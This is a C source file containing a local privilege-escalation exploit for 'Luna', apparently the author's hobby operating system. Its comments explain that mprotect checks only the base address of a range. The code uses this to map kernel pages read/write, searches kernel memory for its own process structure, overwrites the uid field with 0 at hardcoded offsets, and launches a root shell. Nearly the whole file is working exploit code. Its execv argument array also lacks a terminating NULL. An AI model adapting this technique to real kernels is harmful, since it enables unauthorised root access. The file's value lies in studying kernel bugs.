#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mman.h>
#include <unistd.h>

// Luna's current (branch main @ commit 1f4c4f1) mprotect has a fatal bug: it checks whether the base address is inside
// the kernel range and refuses to touch it if so, but it doesn't check the entire range we ask it to map. Thus we can
// mmap one page below the kernel range, and then mprotect that page, which is in the user range, and 199 others, which
// are in the kernel address range. Since the starting address is in the user range, mprotect happily maps everything
// read/write for us. Thus we can inspect and touch the first 199 pages of kernel memory :) Turns out the first process
// structures are located there, so we search for our file path '/bin/hax', and skip the first occurrence, since it's
// from something else (the initial ramdisk I believe?). Then we can use some offsets to find the 'uid' field, and set
// it to 0.

// How do we solve this? Easy, we don't. I'm not currently developing the main branch, but rewriting the OS from scratch
// on another branch (restart). I just thought it would be fun to try to write an exploit for this old, buggy branch :)

#define KERNEL_ADDRESS_BASE 0xfffffffff8000000

#ifndef PAGE_SIZE
#define PAGE_SIZE 4096
#endif

// Protect 1 user page + 199 kernel pages
#define PAGES 200

// We map this page as user memory.
static void* base = (void*)(KERNEL_ADDRESS_BASE - PAGE_SIZE);

void cleanup()
{
    // This address is too high for it to be automatically cleaned up by the kernel, so we need to unmap it ourselves at
    // exit.
    munmap(base, PAGE_SIZE);
}

int main()
{
    if (getuid() == 0)
    {
        printf("You don't need me, you're already root!\n");
        return 1;
    }

    void* rc = mmap(base, PAGE_SIZE, PROT_READ, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    if (rc == MAP_FAILED)
    {
        perror("mmap");
        return 1;
    }

    atexit(cleanup);

    if (mprotect(base, PAGE_SIZE * PAGES, PROT_READ | PROT_WRITE) < 0)
    {
        perror("mprotect");
        return 1;
    }

    char* ptr = (char*)KERNEL_ADDRESS_BASE;

    // Accessing this pointer and anything beyond it will page fault.
    char* end = (char*)(KERNEL_ADDRESS_BASE + PAGE_SIZE * (PAGES - 1));

    int level = 0;

    while ((ptr = memchr(ptr, '/', end - ptr)))
    {
        if ((int)(end - ptr) < 9) // Not enough mapped space for the string '/bin/hax'
        {
            printf("Can't find myself\n");
            return 1;
        }
        if (!strncmp(ptr, "/bin/hax", end - ptr))
        {
            if (level < 1) // skip the initrd
            {
                ptr++;
                level++;
                continue;
            }

            printf("Found myself @ %p, let's make me root!\n", (void*)ptr);
            char* proc_ptr = (char*)(ptr - 1616); // The process structure!

            int* uid_ptr = (int*)(proc_ptr + 232);

            *uid_ptr = 0;

            seteuid(getuid());

            if (getuid() == 0)
            {
                printf("I'm root, let's open a shell!\n");
                setgid(0);
                cleanup();
                char* argv[] = {"/bin/sh"};
                execv(argv[0], argv);
                perror("execv");
                return 1;
            }
            else { printf("Failed to make myself root, maybe I found the wrong structure? Try again.\n"); }
            return 1;
        }
        ptr++;
    }

    printf("Can't find myself\n");
    return 1;
}